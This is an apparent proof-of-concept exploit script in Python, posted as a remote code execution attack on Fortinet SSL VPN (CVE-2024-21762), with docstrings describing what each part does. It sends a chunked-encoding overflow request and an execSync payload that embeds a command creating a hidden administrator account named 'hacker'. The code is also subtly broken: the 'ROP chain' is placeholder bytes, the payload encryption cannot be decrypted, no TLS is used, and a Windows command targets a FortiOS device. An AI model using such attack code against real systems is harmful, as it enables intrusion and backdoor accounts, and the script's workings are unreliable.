RCE, FortiOS & FortiProxy, CVE-2024-21762

CVE-2024-21762 PoC (Fortinet SSL VPN) out-of-bounds vulnerability

Python:
import  socket
 import  time
 import  random
 import  struct
 from  Crypto . Cipher  import  AES

# Placeholder hostname as posted; used both as the TCP connect address and as
# the HTTP Host header value in execute_exploit(). As given, the script cannot
# reach any real host.
TARGET  =  'xxxxxxxxxxxx'
# Connections go to 443 as plain TCP: establish_connection() never wraps the
# socket in TLS, so every request below is sent in cleartext even though the
# post describes the target as an SSL VPN.
PORT  =  443

def  establish_connection ( target ,  port ):
    """Open a plain IPv4 TCP connection to ``target``:``port`` and return it.

    Args:
        target: Hostname or IPv4 address passed straight to ``connect``.
        port: TCP port number.

    Returns:
        A connected ``socket.socket``. The caller owns it and must close it
        (send_payload does so via ``with``).

    Raises:
        OSError: on name-resolution or connection failure; nothing is caught
            here.

    Notes:
        No TLS is negotiated and no ``settimeout`` is applied, so the connect
        is bounded only by the OS default.
    """
    sock  =  socket . socket ( socket . AF_INET ,  socket . SOCK_STREAM )
    sock . connect (( target ,  port ))
    return  sock

 def  send_payload ( payload ,  target ,  port ):
    """Open a fresh connection, write all of ``payload``, then close it.

    Args:
        payload: Raw bytes handed to ``sendall`` unchanged.
        target: Host passed to establish_connection().
        port: Port passed to establish_connection().

    Returns:
        None. Nothing is ever read from the socket, so the server's response
        (status line, body, or a TLS alert for the cleartext write) is
        discarded and the caller gets no success/failure signal.
    """
    with  establish_connection ( target ,  port )  as  sock :
        sock . sendall ( payload )

def  generate_rop_chain ():
    """Return a fixed 6-byte placeholder; despite the name, no ROP chain is built.

    Returns:
        The literal ``b"\\x90\\x90\\x90..."``: three NOP bytes followed by the
        three ASCII characters ``...``. It contains no addresses and is simply
        concatenated into the first request body by execute_exploit().
    """
    rop_chain  =  b "\x90\x90\x90..."   # placeholder bytes, not gadget addresses; the trailing "..." is literal text
    return  rop_chain

 def  generate_js_payload ( command ):
    """Return a UTF-8 encoded Node.js snippet that wraps ``command`` in ``execSync``.

    Args:
        command: Interpolated verbatim into a double-quoted JS string; no
            escaping is applied, so quotes in ``command`` break the snippet.

    Returns:
        ``bytes`` of the JavaScript source. Nothing in this script evaluates
        JavaScript, and the bytes are AES-encrypted under a throwaway key
        before they leave the host (see encrypt_payload), so the string only
        ever travels as opaque request-body data.
    """
    js_payload  =  f '(function(){{var cp=require("child_process");cp.execSync("{command}");}})();'
    return  js_payload . encode ()

def  encrypt_payload ( payload ):
    """AES-CBC encrypt ``payload`` under a one-shot random key and return key + ciphertext.

    Args:
        payload: Arbitrary bytes.

    Returns:
        16 key bytes followed by the CBC ciphertext, i.e. ``16 + len(padded)``
        bytes. Because the IV below is generated inline and never returned or
        transmitted, the output cannot be decrypted by any recipient even
        though the key is shipped in the clear. In effect this produces
        random-looking filler, not a protected message.
    """
    # Key material comes from ``random`` (a PRNG, not ``secrets``); one byte
    # per randint call, packed with struct.
    key  =  b "" . join ([ struct . pack ( "B" ,  random . randint ( 0 ,  255 ))  for  _  in  range ( 16 )])
    # The IV is built the same way but only lives inside this expression.
    cipher  =  AES . new ( key ,  AES . MODE_CBC ,  IV = b "" . join ([ struct . pack ( "B" ,  random . randint ( 0 ,  255 ))  for  _  in  range ( 16 )]))
    # Zero padding of 1..16 bytes (not PKCS#7): a payload already ending in
    # NUL bytes could not be unpadded unambiguously.
    padded_payload  =  payload  +  b "\x00"  *  ( 16  -  len ( payload )  %  16 )
    encrypted_payload  =  cipher . encrypt ( padded_payload )
    return  key  +  encrypted_payload

 def  execute_exploit ( command ):
    """Send two hand-built HTTP/1.1 requests to the module-level TARGET:PORT.

    Args:
        command: Forwarded to generate_js_payload(); it ends up only inside the
            AES-encrypted body of the first request.

    Returns:
        None. Both requests are fire-and-forget (send_payload reads nothing),
        the module globals TARGET/PORT are used rather than parameters, and
        the bytes are written over plain TCP (no TLS).

    Request shapes as built here, which is what a proxy or web log would see:
      1. ``POST /remote/hostcheck_validate`` with a correct Content-Length and
         a body of ``generate_rop_chain() + generate_js_payload(command)``
         passed through encrypt_payload(), i.e. random-looking bytes.
      2. After a 2 s pause, ``POST /`` with ``Transfer-Encoding: chunked``
         whose first chunk-size line is 4137 ASCII ``0`` bytes followed by a
         NUL, then a single ``A`` and a blank line.
    """
    rop_chain  =  generate_rop_chain ()
    js_payload  =  generate_js_payload ( command )
    encrypted_payload  =  encrypt_payload ( rop_chain  +  js_payload )

    # Request 1: Content-Length matches the encrypted body exactly.
    data   =  b "POST /remote/hostcheck_validate HTTP/1.1\r\n"
    data  +=  b "Host: "  +  TARGET . encode ()  +  b "\r\n"
    data  +=  b "Content-Length: "  +  str ( len ( encrypted_payload )). encode ()  +  b "\r\n"
    data  +=  b "\r\n"
    data  +=  encrypted_payload

    send_payload ( data ,  TARGET ,  PORT )

    # Fixed delay between the two connections; no response is awaited.
    time . sleep ( 2 )

    # Request 2: chunked body with an oversized chunk-size line (4137 '0's + NUL),
    # then "A" and a terminating blank line. No "0\r\n\r\n" final chunk is sent.
    data   =  b "POST / HTTP/1.1\r\n"
    data  +=  b "Host: "  +  TARGET . encode ()  +  b "\r\n"
    data  +=  b "Transfer-Encoding: chunked\r\n"
    data  +=  b "\r\n"
    data  +=  b "0" * 4137  +  b "\0"
    data  +=  b "A" * 1  +  b "\r\n\r\n"

    send_payload ( data ,  TARGET ,  PORT )

def  main ():
    """Run execute_exploit() with a hard-coded command string.

    The string is a Windows ``net user`` / ``net localgroup`` local-account
    operation. That does not match the FortiOS appliance named in the post,
    and nothing in this script executes it: it is embedded in the
    AES-encrypted body of the first request (see encrypt_payload) and never
    interpreted locally. ``sys.argv`` is not consulted.
    """
    command  =  'net user hacker password123 /add && net localgroup Administrators hacker /add'
    execute_exploit ( command )

# Script entry guard; main() takes no arguments and reads no command line.
if  __name__  ==  "__main__" :
    main ()
 